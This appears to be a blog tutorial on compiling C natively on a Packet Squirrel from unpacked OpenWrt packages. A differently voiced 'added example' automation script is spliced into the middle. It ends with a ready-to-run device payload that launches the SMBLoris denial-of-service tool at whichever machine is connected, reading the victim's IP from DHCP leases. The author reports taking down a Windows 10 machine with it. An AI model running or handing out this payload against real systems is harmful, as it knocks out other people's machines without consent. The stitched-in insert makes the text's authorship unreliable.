Since the storage footprint of the Packet Squirrel is so limited (2 MB for the root filesystem / and 30 MB of tmpfs on /tmp), I decided to find a way to get the GCC compiler and the libraries it needs onto the Packet Squirrel without the native opkg package manager.
I attached an 8 GB USB flash drive to the Packet Squirrel and formatted it from there as an EXT4 partition, /dev/sda1:
Disk /dev/sda: 7807 MB, 7807401984 bytes
250 heads, 5 sectors/track, 12199 cylinders
Units = cylinders of 1250 * 512 = 640000 bytes

   Device Boot      Start         End      Blocks   Id  System
/dev/sda1               1       12199     7624372+  83  Linux
/dev/sda1 gets automounted on /mnt at boot, so we can use this extra space for GCC and its dependencies.
Since I did not want to go through cross-compilation on my x86_64 Linux machine to get the MIPS binaries, I downloaded the precompiled packages from OpenWrt to my x86_64 Linux laptop:
https://downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/
The following packages are needed to compile C code natively on the Packet Squirrel:
wget https://downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/libbfd_2.24-3_ar71xx.ipk
wget https://downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/libopcodes_2.24-3_ar71xx.ipk
wget https://downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/objdump_2.24-3_ar71xx.ipk
wget https://downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/binutils_2.24-3_ar71xx.ipk
wget https://downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/packages/gcc_4.8.3-1_ar71xx.ipk
Once the packages are downloaded, upload them via scp to the /mnt partition on the Packet Squirrel:
scp *.ipk root@172.16.32.1:/mnt/
Log in to the Packet Squirrel via ssh:
ssh root@172.16.32.1
root@squirrel:~# mkdir /mnt/tt
root@squirrel:~# mv /mnt/*.ipk /mnt/tt
root@squirrel:~#
Here is what I did with each ipk package separately in /mnt/tt. The steps below are pretty self-explanatory, since an ipk is really just a gzipped tarball containing other tarballs.
root@squirrel:/mnt/tt# mv libbfd_2.24-3_ar71xx.ipk libbfd_2.24-3_ar71xx.tar.gz
root@squirrel:/mnt/tt# rm -rf b2/
root@squirrel:/mnt/tt# gunzip libbfd_2.24-3_ar71xx.tar.gz
root@squirrel:/mnt/tt# tar -xvf libbfd_2.24-3_ar71xx.tar
./debian-binary
./data.tar.gz
./control.tar.gz
We are only interested in data.tar.gz, which contains the compiled binaries and libraries, so we create a directory called libbfd and move data.tar.gz there for extraction:
root@squirrel:/mnt/tt# rm debian-binary
root@squirrel:/mnt/tt# rm control.tar.gz
root@squirrel:/mnt/tt# rm libbfd_2.24-3_ar71xx.tar
root@squirrel:/mnt/tt# mkdir libbfd
root@squirrel:/mnt/tt# mv data.tar.gz libbfd/
root@squirrel:/mnt/tt# cd libbfd/
root@squirrel:/mnt/tt/libbfd# ls
data.tar.gz
root@squirrel:/mnt/tt/libbfd# tar -zxvf data.tar.gz
./
./usr/
./usr/lib/
./usr/lib/libbfd-2.24.so
./usr/lib/libbfd.s
root@squirrel:/mnt/tt/libbfd# ls -la
drwxr-xr-x    3 root     root          4096 Jul 14 02:11 .
drwxr-xr-x    7 root     root          4096 Jul 14 02:10 ..
-rw-r--r--    1 107      111         393581 Jan 31  2016 data.tar.gz
drwxr-xr-x    3 root     root          4096 Jul 14 02:11 usr
root@squirrel:/mnt/tt/libbfd# rm data.tar.gz
root@squirrel:/mnt/tt/libbfd# cd usr/
root@squirrel:/mnt/tt/libbfd/usr# cd lib/
root@squirrel:/mnt/tt/libbfd/usr/lib# ls -al
drwxr-xr-x    2 root     root          4096 Jul 14 02:11 .
drwxr-xr-x    3 root     root          4096 Jul 14 02:11 ..
-rwxr-xr-x    1 root     root        935260 Jan 31  2016 libbfd-2.24.so
lrwxrwxrwx    1 root     root            14 Jul 14 02:11 libbfd.so -> libbfd-2.24.so
Next we need to create symlinks from the / root filesystem to the extracted binaries and libraries on the /mnt USB flash partition:
root@squirrel:/mnt/tt/libbfd/usr/lib# pwd
/mnt/tt/libbfd/usr/lib
root@squirrel:/mnt/tt/libbfd/usr/lib# ln -s /mnt/tt/libbfd/usr/lib/libbfd-2.24.so /usr/lib/libbfd-2.24.so
root@squirrel:/mnt/tt/libbfd/usr/lib# ln -s /mnt/tt/libbfd/usr/lib/libbfd-2.24.so /usr/lib/libbfd.so
We repeat the same process for the following packages:
binutils_2.24-3_ar71xx.ipk
objdump_2.24-3_ar71xx.ipk
libopcodes_2.24-3_ar71xx.ipk
Once we are done with these, we can finally move on to extracting the GCC ipk package:
root@squirrel:/mnt/tt/gcc/usr# ls -al
drwxr-xr-x    5 root     root          4096 Jul 14 02:06 .
drwxr-xr-x    3 root     root          4096 Jul 14 02:39 ..
drwxr-xr-x    2 root     root          4096 Jul 14 02:06 bin
drwxr-xr-x    3 root     root          4096 Jul 14 02:06 include
drwxr-xr-x    3 root     root          4096 Jul 14 02:06 lib
root@squirrel:/mnt/tt/gcc/usr/include# ls -al
drwxr-xr-x    3 root     root          4096 Jul 14 02:06 .
drwxr-xr-x    5 root     root          4096 Jul 14 02:06 ..
drwxr-xr-x    3 root     root          4096 Jul 14 02:06 c++
So instead of linking file by file, we symlink the whole directory: /usr/include on the Packet Squirrel's root filesystem points at /mnt/tt/gcc/usr/include, like so:
root@squirrel:/mnt/tt/gcc/usr/include# ls -la include
lrwxrwxrwx    1 root     root            25 Jul 14 02:11 include -> /mnt/tt/gcc/usr/include/
Next we do the same for the /mnt/tt/gcc/usr/lib/gcc directory:
root@squirrel:/mnt/tt/gcc/usr/lib# ls -al
drwxr-xr-x    3 root     root          4096 Jul 14 02:06 .
drwxr-xr-x    5 root     root          4096 Jul 14 02:06 ..
drwxr-xr-x    3 root     root          4096 Jul 14 02:06 gcc
root@squirrel:/usr/lib# ls -la gcc
lrwxrwxrwx    1 root     root            25 Jul 14 02:11 gcc -> /disk/tt/gcc/usr/lib/gcc/
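The unpack-and-symlink procedure above, done once per package by hand, as a single script. This is an added example and not the post's own code: it assumes the chaos_calmer ipk layout shown above (a gzipped tar holding ./debian-binary, ./control.tar.gz and ./data.tar.gz), busybox-compatible tar, find, ln and sha256sum on the device, and it adds the check the post skips, comparing the downloaded file's SHA-256 with the SHA256sum the OpenWrt repository publishes for each package in its Packages index. The sample package, its contents and the staging/root directories are all constructed inline, and the function names (verify_ipk, unpack_ipk, link_tree, count_links, make_sample_ipk) are mine.

```shell
#!/bin/sh
# Added example (not from the original post): unpack an OpenWrt .ipk into a
# staging directory on the USB drive and mirror its payload into the root
# filesystem as symlinks, after checking the download's SHA-256.
# Assumes the chaos_calmer layout: the .ipk is a gzipped tar that holds
# ./debian-binary, ./control.tar.gz and ./data.tar.gz.
set -eu

# verify_ipk <package.ipk> <expected sha256>
# The expected value is the SHA256sum line for this package in the
# repository's Packages index (passed in by the caller).
verify_ipk() {
    actual=$(sha256sum "$1" | cut -d' ' -f1)
    [ "$actual" = "$2" ]
}

# unpack_ipk <package.ipk> <staging dir>
# Extracts only data.tar.gz (the binaries and libraries) into
# <staging>/<pkgname> and prints that directory.
unpack_ipk() {
    pkg="$1"; stage="$2"
    dest="$stage/$(basename "$pkg" .ipk)"
    mkdir -p "$dest"
    tar -xzf "$pkg" -C "$dest" ./data.tar.gz      # outer archive: payload only
    tar -xzf "$dest/data.tar.gz" -C "$dest"        # payload: ./usr/...
    rm "$dest/data.tar.gz"
    echo "$dest"
}

# link_tree <absolute staged package dir> <root>
# One symlink under <root> per staged file, so the small root filesystem
# holds only links (the manual ln -s steps from the post).
link_tree() {
    pkgdir="$1"; root="$2"
    (cd "$pkgdir" && find . \( -type f -o -type l \) -print) |
    while read -r rel; do
        rel=${rel#./}
        mkdir -p "$root/$(dirname "$rel")"
        ln -sfn "$pkgdir/$rel" "$root/$rel"
    done
}

# count_links <root>: number of symlinks installed under <root>
count_links() {
    find "$1" -type l | wc -l | tr -d ' '
}

# Constructed sample package standing in for libbfd_2.24-3_ar71xx.ipk:
# a versioned .so, the unversioned symlink to it, and one tool in usr/bin.
make_sample_ipk() {
    out="$1"
    work=$(mktemp -d)
    mkdir -p "$work/payload/usr/lib" "$work/payload/usr/bin" "$work/control"
    printf 'fake shared object\n' > "$work/payload/usr/lib/libfake-1.0.so"
    ln -s libfake-1.0.so "$work/payload/usr/lib/libfake.so"
    printf '#!/bin/sh\necho fake tool\n' > "$work/payload/usr/bin/faketool"
    printf 'Package: libfake\n' > "$work/control/control"
    printf '2.0\n' > "$work/debian-binary"
    (cd "$work/payload" && tar -czf ../data.tar.gz .)
    (cd "$work/control" && tar -czf ../control.tar.gz .)
    (cd "$work" && tar -czf "$out" ./debian-binary ./control.tar.gz ./data.tar.gz)
    rm -rf "$work"
}

# Demo: STAGE plays the role of /mnt/tt on the USB drive, ROOT stands in for /.
STAGE=$(mktemp -d)
ROOT=$(mktemp -d)
PKG="$STAGE/libfake_1.0-1_ar71xx.ipk"
make_sample_ipk "$PKG"
EXPECTED=$(sha256sum "$PKG" | cut -d' ' -f1)   # on a real download: from the Packages index
verify_ipk "$PKG" "$EXPECTED"
PKGDIR=$(unpack_ipk "$PKG" "$STAGE")
link_tree "$PKGDIR" "$ROOT"
echo "installed $(count_links "$ROOT") symlinks under $ROOT"
ls -l "$ROOT/usr/lib"
```

On the device you would call it with ROOT=/ and STAGE=/mnt/tt; link_tree mirrors every file individually, while the post links the whole include and lib/gcc directories, which is fine as long as nothing else on the root filesystem needs to live inside those directories.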
By now you should have a fully working GCC compiler on the Packet Squirrel, and you can try to compile and run some code (SMBLoris.c, for example) that you scp to the device:
root@squirrel:/mnt/tt/gcc/usr/bin# ./gcc -v
Using built-in specs.
COLLECT_GCC=./gcc
COLLECT_LTO_WRAPPER=/mnt/tt/gcc/usr/bin/../lib/gcc/mips-openwrt-linux-uclibc/4.8.3/lto-wrapper
Target: mips-openwrt-linux-uclibc
Configured with: /home/buildbot/slave-local/ar71xx_generic/build/build_dir/target-mips_34kc_uClibc-0.9.33.2/gcc-4.8.3/configure --target=mips-openwrt-linux --host=mips-openwrt-linux --build=x86_64-linux-gnu --program-prefix= --program-suffix= --prefix=/usr --exec-prefix=/usr --bindir=/usr/bin --sbindir=/usr/sbin --libexecdir=/usr/lib --sysconfdir=/etc --datadir=/usr/share --localstatedir=/var --mandir=/usr/man --infodir=/usr/info --disable-nls --build=x86_64-linux-gnu --host=mips-openwrt-linux-uclibc --target=mips-openwrt-linux-uclibc --enable-languages=c,c++ --with-bugurl=https://dev.openwrt.org/ --with-pkgversion='OpenWrt GCC 4.8.3' --enable-shared --disable-__cxa_atexit --enable-target-optspace --with-gnu-ld --disable-nls --disable-libmudflap --disable-multilib --disable-libgomp --disable-libquadmath --disable-libssp --disable-decimal-float --disable-libstdcxx-pch --with-host-libstdcxx=-lstdc++ --prefix=/usr --libexecdir=/usr/lib --with-float=soft
Thread model: posix
gcc version 4.8.3 (OpenWrt GCC 4.8.3)
root@squirrel:/mnt/tt/gcc/usr/bin# ./gcc /mnt/smbloris.c -o /mnt/smbloris
The smbloris.c is taken from Hector Martin's (marcan) GitHub gist here: https://gist.github.com/marcan/6a2d14b0e3eaa5de1795a763fb58641e#file-smbloris-c
The following Packet Squirrel payload can be used to launch the SMBLoris attack from this device onto the local network it is connected to; set it to switch 1/2/3:
# Show SETUP LED
LED SETUP

# Set the network mode to NAT
NETMODE NAT
sleep 5

# You may want to increase your local conntrack limit
echo 1200000 > /proc/sys/net/netfilter/nf_conntrack_max

# Get the IP address for the connected target machine
ip="$(cat /var/dhcp.leases | awk '{print $3}')"

# Execute smbloris against the target IP
/mnt/smbloris eth0 1.1.1.1 255.255.255.254 $ip &
I have tested this against the latest Windows 10 64-bit version 10.0.16299.19 on physical hardware; the CPU gets to 100 % and memory jumps high, as you can see in the video below.
I'm sure there might be some other tools that can be used in a similar manner (exploit code written in C, for example, and compiled on the Packet Squirrel... the possibilities are endless).
Nevertheless, this was a fun exercise.